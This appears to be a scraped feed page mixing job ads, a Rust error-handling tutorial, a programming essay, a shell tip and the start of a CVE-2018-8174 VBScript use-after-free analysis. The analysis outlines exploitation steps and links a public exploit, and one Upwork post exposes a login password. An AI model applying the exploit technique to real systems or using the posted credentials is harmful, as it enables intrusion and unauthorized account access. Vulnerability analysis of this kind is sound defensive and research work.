From OnShift, Inc - Thu, 20 Sep 2018 16:25:59 GMT - View all Cleveland, OH jobs
          SNR. PYTHON DEVELOPER- DEVELOP YOUR MACHINE LEARNING AND DATA ANALYTICS SKILLS      Cache   Translate Page      
Acuity Consultants - Paarl, Western Cape - This is an excellent opportunity for a SNR. PYTHON DEVELOPER to develop their machine learning and data analytics skills. Based in the... has pioneered the InsureTech space in South Africa, by capitalizing on data science and machine learning technology to create the country's first award...
          PYTHON DEVELOPER- DEVELOP YOUR MACHINE LEARNING AND DATA ANALYTICS SKILLS      Cache   Translate Page      
Acuity Consultants - Paarl, Western Cape - This is an excellent opportunity for a Python developer to develop their machine learning and data analytics skills. Based in the NORTHERN... has pioneered the InsureTech space in South Africa, by capitalizing on data science and machine learning technology to create the country's first award...
          C++ Developer with Python skills - Experis - Rahway, NJ      Cache   Translate Page      
| Mercury, Segue, Borland. This specialization is usually performed by senior test practitioner with experience in leading large test teams....
From Experis - Tue, 23 Oct 2018 17:42:46 GMT - View all Rahway, NJ jobs
          Developer Needed for creating a responsive WordPress Website/application - Upwork      Cache   Translate Page      
Looking for a PRO developer who can create an autopilot website for me. It's most likely a tool like YEXT, BrightLocal or tribelocal.com.

if you visit the following website: https://app.tribelocal.com

Email to signin: shopusn at protonmail.com
Password: Local123

Once you log in successfully, look at the whole dashboard carefully and let me know if you can create a website exactly like it for me. Also, please bid your price without any hesitation; the main thing is that I really need a website like that.

Good luck!

Budget: $500
Posted On: November 07, 2018 06:38 UTC
ID: 214651065
Category: Web, Mobile & Software Dev > Web Development
Skills: Automated Call Distribution, Ecrion Software EOS, Fision, Grovo Learning, Merrill DataSite, Octane Render, PostCSS, Python Pandas, Sales Strategy, Union Square Software
Country: Pakistan
click to apply
          Machine Learning Engineer - Stefanini - McLean, VA      Cache   Translate Page      
AWS, Spark, Scala, Python, Airflow, EMR, Redshift, Athena, Snowflake, ECS, DevOps Automation, Integration, Docker, Build and Deployment Tools Ability to provide...
From Indeed - Tue, 16 Oct 2018 20:59:09 GMT - View all McLean, VA jobs
          24 Oracle Linux Updates      Cache   Translate Page      
The following updates have been released for Oracle Linux: ELBA-2018-3339 Oracle Linux 7 libvirt bug fix update ELSA-2018-3032 Low: Oracle Linux 7 binutils security, bug fix, and enhancement update ELSA-2018-3041 Moderate: Oracle Linux 7 python security and bug fix update ELSA-2018-3050 Moderate: Oracle Linux 7 gnutls security, bug fix, and enhancement update ELSA-2018-3052 Moderate: Oracle Linux 7 wget security and bug fix update ELSA-2018-3056 Moderate: Oracle Linux 7 samba security, bug fix, and enhancement update ELSA-2018-3065 Mode...
          Michael Snoyman: Iterators and Errors - Rust Crash Course lesson 3      Cache   Translate Page      

Last time, we finished off with a bouncy ball implementation with some downsides: lackluster error handling and ugly buffering. It also had another limitation: a static frame size. Today, we’re going to address all of these problems, starting with that last one: let’s get some command line arguments to control the frame size.

This post is part of a series based on teaching Rust at FP Complete. If you’re reading this post outside of the blog, you can find links to all posts in the series at the top of the introduction post. You can also subscribe to the RSS feed.

Like last time, I’m going to expect you, the reader, to be making changes to the source code along with me. Make sure to actually type in the code while reading!

Command line arguments

We’re going to modify our application as follows:

  • Accept two command line arguments: the width and the height
  • Both must be valid u32s
  • Too many or too few command line arguments will result in an error message

Sounds easy enough. In a real application, we would use a proper argument-handling library, like clap. But for now, we’re going lower level. Like we did for the sleep function, let’s start by searching the standard library docs for the word args. The first two entries both look relevant.

  • std::env::Args An iterator over the arguments of a process, yielding a String value for each argument.
  • std::env::args Returns the arguments which this program was started with (normally passed via the command line).

Now’s a good time to mention that, by strong convention:

  • Module names (like std and env) and function names (like args) are snake_cased
  • Types (like Args) are PascalCased
    • Exception: primitives like u32 and str are lower case

The std module has an env module. The env module has both an Args type and a args function. Why do we need both? Even more strangely, let’s look at the type signature for the args function:

pub fn args() -> Args

The args function returns a value of type Args. If Args was a type synonym for, say, a vector of Strings, this would make sense. But that’s not the case. And if you check out its docs, there aren’t any fields or methods exposed on Args, only trait implementations!

The extra datatype pattern

Maybe there’s a proper term for this in Rust, but I haven’t seen it myself yet. (If someone has, please let me know so I can use the proper term.) There’s a pervasive pattern in the Rust ecosystem, which in my experience starts with iterators and continues to more advanced topics like futures and async I/O.

  • We want to have composable interfaces
  • We also want high performance
  • Therefore, we define lots of helper data types that allow the compiler to perform some great optimizations
  • And we define traits as an interface to let these types compose nicely with each other

Sound abstract? Don’t worry, we’ll make that concrete in a bit. Here’s the practical outcome of all of this:

  • We end up programming quite a bit against traits, which provide common abstractions and lots of helper functions
  • We get a matching data type for many common functions
  • Often times, our type signatures will end up being massive, representing all of the different composition we performed (though the new-ish -> impl Iterator style helps with that significantly, see the announcement blog post for more details)

Alright, with that out of the way, let’s get back to command line arguments!

CLI args via iterators

Let’s play around in an empty file before coming back to bouncy. (Either use cargo new and cargo run, or use rustc directly, your call.) If I click on the expand button next to the Iterator trait on the Args docs page, I see this function:

fn next(&mut self) -> Option<String>

Let’s play with that a bit:

use std::env::args;

fn main() {
    let mut args = args(); // Yes, that name shadowing works
    println!("{:?}", args.next());
    println!("{:?}", args.next());
    println!("{:?}", args.next());
    println!("{:?}", args.next());
}

Notice that we had to use let mut, since the next method will mutate the value. Now I’m going to run this with cargo run foo bar:

$ cargo run foo bar
   Compiling args v0.1.0 (/Users/michael/Desktop/tmp/args)
    Finished dev [unoptimized + debuginfo] target(s) in 1.60s
     Running `target/debug/args foo bar`
Some("target/debug/args")
Some("foo")
Some("bar")
None

Nice! It gives us the name of our executable, followed by the command line arguments, returning None when there’s nothing left. (For pedants out there: command line arguments aren’t technically required to have the command name as the first argument, it’s just a really strong convention most tools follow.)

Let’s play with this some more. Can you write a loop that prints out all of the command line arguments and then exits? Take a minute, and then I’ll provide some answers.

Alright, done? Cool, let’s see some examples! First, we’ll loop with return.

use std::env::args;

fn main() {
    let mut args = args();
    loop {
        match args.next() {
            None => return,
            Some(arg) => println!("{}", arg),
        }
    }
}

We also don’t need to use return here. Instead of returning from the function, we can just break out of the loop:

use std::env::args;

fn main() {
    let mut args = args();
    loop {
        match args.next() {
            None => break,
            Some(arg) => println!("{}", arg),
        }
    }
}

Or, if you want to save on some indentation, you can use the if let.

use std::env::args;

fn main() {
    let mut args = args();
    loop {
        if let Some(arg) = args.next() {
            println!("{}", arg);
        } else {
            break;
            // return would work too, but break is nicer
            // here, as it is more narrowly scoped
        }
    }
}

You can also use while let. Try to guess what that would look like before checking the next example:

use std::env::args;

fn main() {
    let mut args = args();
    while let Some(arg) = args.next() {
        println!("{}", arg);
    }
}

Getting better! Alright, one final example:

use std::env::args;

fn main() {
    for arg in args() {
        println!("{}", arg);
    }
}

Whoa, what?!? Welcome to one of my favorite aspects of Rust. Iterators are a concept built into the language directly, via for loops. A for loop will automate the calling of next(). It also hides away the fact that there’s some mutable state at play, at least to some extent. This is a powerful concept, and allows a lot of code to end up with a more functional style, something I happen to be a big fan of.

Skipping

It’s all well and good that the first argument is the name of the executable. But we typically don’t care about that. Can we somehow skip that in our output? Well, here’s one approach:

use std::env::args;

fn main() {
    let mut args = args();
    let _ = args.next(); // drop it on the floor
    for arg in args {
        println!("{}", arg);
    }
}

That works, but it’s a bit clumsy, especially compared to our previous version that had no mutable variables. Maybe there’s some other way to skip things. Let’s search the standard library again. I see the first results as std::iter::Skip and std::iter::Iterator::skip. The former is a data type, and the latter is a method on the Iterator trait. Since our Args type implements the Iterator trait, we can use it. Nice!

Side note Haskellers: skip is like drop in most Haskell libraries, like Data.List or vector. drop has a totally different meaning in Rust (dropping owned data), so skip is a better name in Rust.

Let’s look at some signatures from the docs above:

pub struct Skip<I> { /* fields omitted */ }
fn skip(self, n: usize) -> Skip<Self>

Hmm… deep breaths. Skip is a data type that is parameterized over some data type, I. This is a common pattern in iterators: Skip wraps around an existing data type and adds some new functionality to how it iterates. The skip method will consume an existing iterator, take the number of arguments to skip, and return a new Skip<OrigDataType> value. How do I know it consumes the original iterator? The first parameter is self, not &self or &mut self.

That seemed like a lot of concepts. Fortunately, usage is pretty easy:

use std::env::args;

fn main() {
    for arg in args().skip(1) {
        println!("{}", arg);
    }
}

Nice!

Exercise 1 Type inference lets the program above work just fine without any type annotations. However, it’s a good idea to get used to the generated types, since you’ll see them all too often in error messages. Get the program below to compile by fixing the type signature. Try to do it without using compiler at first, since the error messages will almost give the answer away.

use std::env::{args, Args};
use std::iter::Skip;

fn main() {
    let args: Args = args().skip(1);
    for arg in args {
        println!("{}", arg);
    }
}

This layering-of-datatypes approach, as mentioned above, is a real boon to performance. Iterator-heavy code will often compile down to an efficient loop, comparable with the best hand-rolled loop you could have written. However, iterator code is much higher level, more declarative, and easy to maintain and extend.

There’s a lot more to iterators, but we’re going to stop there for the moment, since we still want to process our command line parameters, and we need to learn one more thing first.

Parsing integers

If you search the standard library for parse, you’ll find the str::parse method. The documentation does a good job of explaining things, I won’t repeat that here. Please go read that now.

OK, you’re back? Turbofish is a funny name, right?

Take a crack at writing a program that prints the result of parsing each command line argument as a u32, then check my version:

fn main() {
    for arg in std::env::args().skip(1) {
        println!("{:?}", arg.parse::<u32>());
    }
}

And let’s try running it:

$ cargo run one 2 three four 5 6 7
Err(ParseIntError { kind: InvalidDigit })
Ok(2)
Err(ParseIntError { kind: InvalidDigit })
Err(ParseIntError { kind: InvalidDigit })
Ok(5)
Ok(6)
Ok(7)

When the parse is successful, we get the Ok variant of the Result enum. When the parse fails, we get the Err variant, with a ParseIntError telling us what went wrong. (The type signature on parse itself uses some associated types to indicate this type, we’re not going to get into that right now.)

This is a common pattern in Rust. Rust has no runtime exceptions, so we track potential failure at the type level with actual values.

Side note You may think of panics as similar to runtime exceptions, and to some extent they are. However, you’re not able to properly recover from panics, making them different in practice from how runtime exceptions are used in other languages like Python.

Parse our command line

We’re finally ready to get started on our actual command line parsing! We’re going to be overly tedious in our implementation, especially with our data types. After we finish implementing this in a blank file, we’ll move the code into the bouncy implementation itself. First, let’s define a data type to hold a successful parse, which will contain the width and the height.

Challenge Will this be a struct or an enum? Can you try implementing this yourself first?

Since we want to hold onto multiple values, we’ll be using a struct. I’d like to use named fields, so we have:

struct Frame {
    width: u32,
    height: u32,
}

Next, let’s define an error type to represent all of the things that can go wrong during this parse. We have:

  • Too few arguments
  • Too many arguments
  • Invalid integer

Challenge Are we going to use a struct or an enum this time?

This time, we’ll use an enum, because we’ll only detect one of these problems (whichever we notice first). Aficionados of web forms and applicative parsing may scoff at this and say we should detect all errors, but we’re going to be lazy.

enum ParseError {
    TooFewArgs,
    TooManyArgs,
    InvalidInteger(String),
}

Notice that the InvalidInteger variant takes a payload, the String it failed parsing. This is what makes enums in Rust so much more powerful than enumerations in most other languages.
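A quick sketch of why the payload matters: pattern matching can pull the offending string back out of the variant (the `describe` helper here is illustrative, not part of the game):

```rust
#[derive(Debug)]
enum ParseError {
    TooFewArgs,
    TooManyArgs,
    InvalidInteger(String),
}

fn describe(err: &ParseError) -> String {
    match err {
        ParseError::TooFewArgs => String::from("too few arguments"),
        ParseError::TooManyArgs => String::from("too many arguments"),
        // The payload travels with the variant, so the error message
        // can include the exact input that failed to parse.
        ParseError::InvalidInteger(s) => format!("not a valid integer: {}", s),
    }
}

fn main() {
    let err = ParseError::InvalidInteger(String::from("three"));
    println!("{}", describe(&err));
}
```

A plain C-style enumeration could only say "an invalid integer appeared somewhere"; the payload lets the error carry its own evidence.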

Challenge We’re going to write a parse_args helper function. Can you guess what its type signature will be?

Combining all of the knowledge we established above, here’s an implementation:

#[derive(Debug)]
struct Frame {
    width: u32,
    height: u32,
}

#[derive(Debug)]
enum ParseError {
    TooFewArgs,
    TooManyArgs,
    InvalidInteger(String),
}

fn parse_args() -> Result<Frame, ParseError> {
    use self::ParseError::*; // bring variants into our namespace

    let mut args = std::env::args().skip(1);

    match args.next() {
        None => Err(TooFewArgs),
        Some(width_str) => {
            match args.next() {
                None => Err(TooFewArgs),
                Some(height_str) => {
                    match args.next() {
                        Some(_) => Err(TooManyArgs),
                        None => {
                            match width_str.parse() {
                                Err(_) => Err(InvalidInteger(width_str)),
                                Ok(width) => {
                                    match height_str.parse() {
                                        Err(_) => Err(InvalidInteger(height_str)),
                                        Ok(height) => Ok(Frame {
                                            width,
                                            height,
                                        }),
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
    }
}

fn main() {
    println!("{:?}", parse_args());
}

Holy nested blocks Batman, that is a lot of indentation! The pattern is pretty straightforward:

  • Pattern match
  • If we got something bad, stop with an Err
  • If we got something good, keep going

Haskellers at this point are screaming about do notation and monads. Ignore them. We’re in the land of Rust, we don’t take kindly to those things around here. (Someone please yell at me for that terrible pun.)

Exercise 2 Why didn’t we need to use the turbofish on the call to parse above?

What we want to do is return early from our function. You know what keyword can help with that? That’s right: return!

fn parse_args() -> Result<Frame, ParseError> {
    use self::ParseError::*;

    let mut args = std::env::args().skip(1);

    let width_str = match args.next() {
        None => return Err(TooFewArgs),
        Some(width_str) => width_str,
    };

    let height_str = match args.next() {
        None => return Err(TooFewArgs),
        Some(height_str) => height_str,
    };

    match args.next() {
        Some(_) => return Err(TooManyArgs),
        None => (),
    }

    let width = match width_str.parse() {
        Err(_) => return Err(InvalidInteger(width_str)),
        Ok(width) => width,
    };

    let height = match height_str.parse() {
        Err(_) => return Err(InvalidInteger(height_str)),
        Ok(height) => height,
    };

    Ok(Frame {
        width,
        height,
    })
}

Much nicer to look at! However, it’s still a bit repetitive, and littering those returns everywhere is subjectively not very nice. In fact, while typing this up, I accidentally left off a few of the returns and got to stare at some long error messages. (Try that for yourself.)

Question mark

Side note The trailing question mark we’re about to introduce used to be the try! macro in Rust. If you’re confused about the seeming overlap: it’s simply a transition to new syntax.

The pattern above is so common that Rust has built in syntax for it. If you put a question mark after an expression, it basically does the whole match/return-on-Err thing for you. It’s more powerful than we’ll demonstrate right now, but we’ll get to that extra power a bit later.
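In other words, `expr?` on a `Result` is roughly shorthand for the match-and-early-return we wrote by hand. A sketch using `str::parse` (not the game’s code) makes the desugaring concrete:

```rust
use std::num::ParseIntError;

fn double_of(s: &str) -> Result<u32, ParseIntError> {
    // Equivalent to: let n: u32 = s.parse()?;
    let n: u32 = match s.parse() {
        Ok(n) => n,
        Err(e) => return Err(e),
    };
    Ok(n * 2)
}

fn main() {
    println!("{:?}", double_of("21"));
    println!("{:?}", double_of("twenty-one"));
}
```

The question mark version reads linearly: each `?` either unwraps the `Ok` value or returns the `Err` from the enclosing function immediately.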

To start off, we’re going to define some helper functions to:

  • Require another argument
  • Require that there are no more arguments
  • Parse a u32

All of these need to return Result values, and we’ll use a ParseError for the error case in all of them. The first two functions need to take a mutable reference to our arguments. (As a side note, I’m going to stop using the skip method now, because if I do it will give away the solution to exercise 1.)

use std::env::Args;

fn require_arg(args: &mut Args) -> Result<String, ParseError> {
    match args.next() {
        None => Err(ParseError::TooFewArgs),
        Some(s) => Ok(s),
    }
}

fn require_no_args(args: &mut Args) -> Result<(), ParseError> {
    match args.next() {
        Some(_) => Err(ParseError::TooManyArgs),
        // I think this looks a little weird myself.
        // But we're wrapping up the unit value ()
        // with the Ok variant. You get used to it
        // after a while, I guess
        None => Ok(()),
    }
}

fn parse_u32(s: String) -> Result<u32, ParseError> {
    match s.parse() {
        Err(_) => Err(ParseError::InvalidInteger(s)),
        Ok(x) => Ok(x),
    }
}

Now that we have these helpers defined, our parse_args function is much easier to look at:

fn parse_args() -> Result<Frame, ParseError> {
    let mut args = std::env::args();

    // skip the command name
    let _command_name = require_arg(&mut args)?;

    let width_str = require_arg(&mut args)?;
    let height_str = require_arg(&mut args)?;
    require_no_args(&mut args)?;
    let width = parse_u32(width_str)?;
    let height = parse_u32(height_str)?;

    Ok(Frame { width, height })
}

Beautiful!

Forgotten question marks

What do you think happens if you forget the question mark on the let width_str line? If you do so:

  • width_str will contain a Result<String, ParseError> instead of a String
  • The call to parse_u32 will not type check
error[E0308]: mismatched types
  --> src/main.rs:50:27
   |
50 |     let width = parse_u32(width_str)?;
   |                           ^^^^^^^^^ expected struct `std::string::String`, found enum `std::result::Result`
   |
   = note: expected type `std::string::String`
              found type `std::result::Result<std::string::String, ParseError>`

That’s nice. But what will happen if we forget the question mark on the require_no_args call? We never use the output value there, so it will type check just fine. Now we have the age-old problem of C: we’re accidentally ignoring error codes!

Well, not so fast. Check out this wonderful warning from the compiler:

warning: unused `std::result::Result` which must be used
  --> src/main.rs:49:5
   |
49 |     require_no_args(&mut args);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^
   |
   = note: #[warn(unused_must_use)] on by default
   = note: this `Result` may be an `Err` variant, which should be handled

That’s right: Rust will detect if you’ve ignored a potential failure. There is a hole in this in the current code sample:

let _command_name = require_arg(&mut args);

That doesn’t trigger the warning, since in let _name = blah;, the leading underscore says “I know what I’m doing, I don’t care about this value.” Instead, it’s better to write the code without the let:

require_arg(&mut args);

Now we get a warning, which can be solved with the added trailing question mark.

Exercise 3

It would be more convenient to use method call syntax. Let’s define a helper data type to make this possible. Fill in the implementation of the code below.

#[derive(Debug)]
struct Frame {
    width: u32,
    height: u32,
}

#[derive(Debug)]
enum ParseError {
    TooFewArgs,
    TooManyArgs,
    InvalidInteger(String),
}

struct ParseArgs(std::env::Args);

impl ParseArgs {
    fn new() -> ParseArgs {
        unimplemented!()
    }


    fn require_arg(&mut self) -> Result<String, ParseError> {
        match self.0.next() {
        }
    }
}

fn parse_args() -> Result<Frame, ParseError> {
    let mut args = ParseArgs::new();

    // skip the command name
    args.require_arg()?;

    let width_str = args.require_arg()?;
    let height_str = args.require_arg()?;
    args.require_no_args()?;
    let width = parse_u32(width_str)?;
    let height = parse_u32(height_str)?;

    Ok(Frame { width, height })
}

fn main() {
    println!("{:?}", parse_args());
}

Updating bouncy

This next bit should be done as a Cargo project, not with rustc. Let’s start a new empty project:

$ cargo new bouncy-args --bin
$ cd bouncy-args

Next, let’s get the old code and place it in src/main.rs. You can copy-paste manually, or run:

$ curl https://gist.githubusercontent.com/snoyberg/5307d493750d7b48c1c5281961bc31d0/raw/8f467e87f69a197095bda096cbbb71d8d813b1d7/main.rs > src/main.rs

Run cargo run and make sure it works. You can use Ctrl-C to kill the program.

We already wrote fully usable argument parsing code above. Instead of putting it in the same source file, let’s put it in its own file. In order to do so, we’re going to have to play with modules in Rust.

For convenience, you can view the full source code as a Gist. We need to put this in src/parse_args.rs:

$ curl https://gist.githubusercontent.com/snoyberg/568899dc3ae6c82e54809efe283e4473/raw/2ee261684f81745b21e571360b1c5f5d77b78fce/parse_args.rs > src/parse_args.rs

If you run cargo build now, it won’t even look at parse_args.rs. Don’t believe me? Add some invalid content to the top of that file and run cargo build again. Nothing happens, right? We need to tell the compiler that we’ve got another module in our project. We do that by modifying src/main.rs. Add the following line to the top of your file:

mod parse_args;

If you put in that invalid line before, running cargo build should now result in an error message. Perfect! Go ahead and get rid of that invalid line and make sure everything compiles and runs. We won’t be accepting command line arguments yet, but we’re getting closer.

Use it!

We’re currently getting some dead code warnings, since we aren’t using anything from the new module:

warning: struct is never constructed: `Frame`
 --> src/parse_args.rs:2:1
  |
2 | struct Frame {
  | ^^^^^^^^^^^^
  |
  = note: #[warn(dead_code)] on by default

warning: enum is never used: `ParseError`
 --> src/parse_args.rs:8:1
  |
8 | enum ParseError {
  | ^^^^^^^^^^^^^^^

warning: function is never used: `parse_args`
  --> src/parse_args.rs:14:1
   |
14 | fn parse_args() -> Result<Frame, ParseError> {
   | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Let’s fix that. To start off, add the following to the top of your main module, just to prove that we can, in fact, use our new module:

println!("{:?}", parse_args::parse_args());
return; // don't start the game, our output will disappear

Also, add a pub in front of the items we want to access from the main.rs file, namely:

  • struct Frame
  • enum ParseError
  • fn parse_args

Running this gets us:

$ cargo run
   Compiling bouncy-args v0.1.0 (/Users/michael/Desktop/tmp/bouncy-args)
warning: unreachable statement
   --> src/main.rs:115:5
    |
115 |     let mut game = Game::new();
    |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^
    |
    = note: #[warn(unreachable_code)] on by default

warning: variable does not need to be mutable
   --> src/main.rs:115:9
    |
115 |     let mut game = Game::new();
    |         ----^^^^
    |         |
    |         help: remove this `mut`
    |
    = note: #[warn(unused_mut)] on by default

    Finished dev [unoptimized + debuginfo] target(s) in 0.67s
     Running `target/debug/bouncy-args`
Err(TooFewArgs)

It’s nice that we get an unreachable statement warning. It’s also a bit weird that game is no longer required to be mutable. Strange. But most importantly: our argument parsing is working!

Let’s try to use this. We’ll modify the Game::new() method to accept a Frame as input:

impl Game {
    fn new(frame: Frame) -> Game {
        let ball = Ball {
            x: 2,
            y: 4,
            vert_dir: VertDir::Up,
            horiz_dir: HorizDir::Left,
        };
        Game {frame, ball}
    }

    ...
}

And now we can rewrite our main function as:

fn main () {
    match parse_args::parse_args() {
        Err(e) => {
            // prints to stderr instead of stdout
            eprintln!("Error parsing args: {:?}", e);
        },
        Ok(frame) => {
            let mut game = Game::new(frame);
            let sleep_duration = std::time::Duration::from_millis(33);
            loop {
                println!("{}", game);
                game.step();
                std::thread::sleep(sleep_duration);
            }
        }
    }
}

Mismatched types

We’re good, right? Not quite:

error[E0308]: mismatched types
   --> src/main.rs:114:38
    |
114 |             let mut game = Game::new(frame);
    |                                      ^^^^^ expected struct `Frame`, found struct `parse_args::Frame`
    |
    = note: expected type `Frame`
               found type `parse_args::Frame`

We now have two different definitions of Frame: in our parse_args module, and in main.rs. Let’s fix that. First, delete the Frame declaration in main.rs. Then add the following after our mod parse_args; statement:

use self::parse_args::Frame;

self says we’re finding a module that’s a child of the current module.

Public and private

Now everything will work, right? Wrong again! cargo build will vomit a bunch of these errors:

error[E0616]: field `height` of struct `parse_args::Frame` is private
  --> src/main.rs:85:23
   |
85 |         for row in 0..self.frame.height {
   |

By default, identifiers are private in Rust. In order to expose them from one module to another, you need to add the pub keyword. For example:

pub width: u32,

Go ahead and add pub as needed. Finally, if you run cargo run, you should see Error parsing args: TooFewArgs. And if you run cargo run 5 5, you should see a much smaller frame than before. Hurrah!

Exercise 4

What happens if you run cargo run 0 0? How about cargo run 1 1? Put in some better error handling in parse_args.

Exit code

Alright, one final irritation. Let’s provide some invalid arguments and inspect the exit code of the process:

$ cargo run 5
Error parsing args: TooFewArgs
$ echo $?
0

For those not familiar: a 0 exit code means everything went OK. That’s clearly not the case here! If we search the standard library, it seems the std::process::exit can be used to address this. Go ahead and try using that to solve the problem here.

However, we’ve got one more option: we can return a Result straight from main!

fn main () -> Result<(), self::parse_args::ParseError> {
    match parse_args::parse_args() {
        Err(e) => {
            return Err(e);
        },
        Ok(frame) => {
            let mut game = Game::new(frame);
            let sleep_duration = std::time::Duration::from_millis(33);
            loop {
                println!("{}", game);
                game.step();
                std::thread::sleep(sleep_duration);
            }
        }
    }
}

Exercise 5 Can you do something to clean up the nesting a bit here?

Better error handling

The error handling problem we had in the last lesson involved the call to top_bottom. I’ve already included a solution to that in the download of the code provided. Guess what I changed since last time and then check the code to confirm that you’re right.

If you’re following very closely, you may be surprised that there aren’t more warnings about unused Result values coming from other calls to write!. As far as I can tell, this is in fact a bug in the Rust compiler.

Still, it would be good practice to fix up those calls to write!. Take a stab at doing so.

Next time

We still didn’t fix our double buffering problem, we’ll get to that next time. We’re also going to introduce some more error handling from the standard library. And maybe we’ll get to play a bit more with iterators as well.

Rust at FP Complete | Introduction


          Matt Parsons: Capability and Suitability      Cache   Translate Page      

Gary Bernhardt has a fantastic talk on Capability vs Suitability, where he separates advances in software engineering into two buckets:

  • Capability: The ability to do new things!
  • Suitability: The ability to do things well.

Capability is progressive and daring, while suitability is conservative and boring. Capability wants to create entirely new things, while suitability wants to refine existing things.

This post is going to explore a metaphor with bicycles, specifically bike tires, while we think about capability and suitability. When you get a bike, you have so many options. Tire size is one of them. You can opt for a super narrow road tire – a mere 19mm in width! Or, on the other end of the scale, you can opt for a truly fat tire at around 5” in width. What’s the difference?

Narrower tires are less capable – there is less terrain you can cover on a narrow tire. However, they’re more suitable for the terrain they can cover – a 19mm tire will be significantly lighter and faster than a 5” tire. A good 19mm tire weighs around 200g, while a 5” tire might weigh 1,800g each. Lugging around an extra 7lbs of rubber takes a lot of energy! Additionally, all that rubber is going to have a lot of rolling resistance – it’ll be harder to push across the ground on smooth surfaces where the 19mm tire excels.

So, most cyclists don’t use fat tire bikes. But they also don’t use 19mm skinny tires. Most road cyclists have moved up to 25 or 28mm tires. While the 19mm tires work fantastically on a perfectly smooth surface, they start suffering when the road gets bumpy. All the bumps and rough surfaces call for a slightly more capable tire. The wider tires can run lower air pressure, which lets them float over bumps rather than being bumped up and down.

So, we have two competing forces in bike tires:

  • The speed and comfort on the terrain you ride most frequently
  • The speed and comfort on the worst terrain you encounter regularly

You want enough capability to handle the latter, while a tire that’s suitable for the former.

In computer programming, we tend to reach for the most capable thing we can get our hands on. Dynamically typed, impure, and Turing complete programming languages like Ruby, JavaScript, and Python are immensely popular. Statically typed languages are often seen as stifling, and pure languages even more so. There simply aren’t many languages that are Turing incomplete, that’s how little we like them!

Yet, these extra gains in capability are often unnecessary. There’s very little code that’s difficult to statically type with a reasonable type system. Impurity seems convenient, until you realize that you need to look at every single method call to see why the code that renders an HTML page is making an N+1 query and ruining performance. Indeed, even Turing completeness is overrated – a Turing incomplete language permits dramatically more optimizations and static analysis for bug prevention, and very few programs actually require Turing completeness.

In this sense, programmers are like cyclists that pick up the 5” tire fat bikes and then wonder why they’re moving so slow. They may ride in the snow or deep sand once or twice a year, and they stick with the 5” tire for that reason alone. Programmers that are willing to give up the capability they don’t need in order to purchase suitability they could use tend to go faster, as you might expect. Folks that learn Haskell and become sufficiently familiar with purely functional and statically typed programming tend to take those practices with them, even in impure or dynamically typed languages.

It is easier to understand what you did when you limit what you can do.


          Python version to a file      Cache   Translate Page      
$ echo "$(python -V 2>&1)" > file
This command sends the Python version to a file and is intended for use in scripts. A simple redirection (python -V > file) doesn't work on Python 2 because "python -V" prints the version to stderr rather than stdout (Python 3.4+ moved it to stdout); the 2>&1 captures it either way.
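Inside a Python script itself, the stderr/stdout question can be sidestepped entirely; this standard-library sketch writes the interpreter version to a file directly:

```python
import platform

# platform.python_version() returns the version string directly,
# regardless of which stream `python -V` would have printed to.
with open('file', 'w') as f:
    f.write('Python %s\n' % platform.python_version())

print(open('file').read().strip())
```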

commandlinefu.com



          Windows VBScript Engine Remote Code Execution Vulnerability: CVE-2018-8174 Analysis and Exploitation      Cache   Translate Page      
Vulnerability overview

A remote code execution vulnerability exists in the way the VBScript engine handles objects in memory. The vulnerability can corrupt memory in a way that lets an attacker execute arbitrary code in the context of the current user. An attacker who successfully exploits it gains the same rights as the current user; if the current user is logged on with administrative privileges, the attacker can take control of the affected system, installing programs; viewing, changing, or deleting data; or creating new accounts with full user rights.

In a web-based attack scenario, an attacker could host a specially crafted website that exploits the vulnerability through Internet Explorer and then lure users into viewing it. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine, or take advantage of compromised websites and websites that accept or host user-provided content or advertisements; such sites can contain specially crafted content that exploits the vulnerability. On May 8, 2018, Microsoft released a security patch; most popular system versions are affected.

Basic information

Vulnerability ID: CVE-2018-8174
Name: Microsoft VBScript engine remote code execution vulnerability
Type: remote code execution
Threat type: use-after-free (UAF)
Affected versions: Windows 7 x86 and x64, RT 8.1, Server 2008 and R2, Server 2012 and R2, Server 2016, 8.1, 10, and server editions

Testing environment: Windows 7 32-bit, IE8. Exploit: https://www.exploit-db.com/exploits/44741/

How the vulnerability works

The in-the-wild sample is heavily obfuscated (part of its code is shown in Figure 1), so the analysis below uses a simplified PoC (Figure 2). [Figure 1: the sample is heavily obfuscated. Figure 2: the crash PoC.]

The crash PoC defines two arrays, array_a and array_b, and declares a class MyTest that overrides the destructor Class_Terminate. It creates an instance of MyTest and assigns it to array_a(1), then clears array_a via Erase array_a. Destroying the elements of array_a triggers the script's Class_Terminate, which stores an extra reference to the MyTest instance in array_b(0) (instance reference count +1) and then removes array_a(1)'s reference via array_a(1) = 1 (reference count -1) to keep the count balanced. At that point the MyTest instance is freed, but array_b(0) still holds a reference to it, so array_b(0) points at the freed instance's memory. Finally, MyTestVuln accesses the unallocated memory via b(0) = 0 and triggers the bug.

When we run this PoC in IE with page heap enabled, we can observe a crash in OLEAUT32!VariantClear: an Access Violation exception when the freed memory is referenced.

The heap information shows that eax (0x14032fd0) was freed in the call stack of vbscript!VbsErase; vbscript!VbsErase corresponds to Erase in the script, and eax is exactly the VBScriptClass object freed by VBScriptClass::Release, i.e. the MyTest instance in the script. The logic of VBScriptClass::Release is shown in the figure.

VBScriptClass::Release first decrements the class's reference count (&VBScriptClass+0x4). If the count reaches 0 it calls VBScriptClass::TerminateClass, and because the script overrides Class_Terminate, this yields one opportunity for script execution. Here, before the VBScriptClass memory is freed, the about-to-be-freed address can be saved into a script-controlled variable (Set array_b(0) = array_a(1)), the reference count balanced via array_a(1) = 1, and the memory finally freed.

At Set array_a(1) = New MyTest, the VBScriptClass reference count is 2. After Erase array_a returns, the memory MyTest points to has been freed, but array_b(0) still points at it, forming a dangling pointer (see figure).

Exploitation analysis

The key to exploiting a UAF is how to use the dangling pointer to manipulate memory. This exploit performs the UAF several times to achieve type confusion, forges an array object to obtain arbitrary address read/write, and finally gains code execution by constructing an object and then releasing it. Code execution does not rely on classic ROP or on the "GodMode" technique; instead the script itself lays out the shellcode.

Forging an array for arbitrary writes

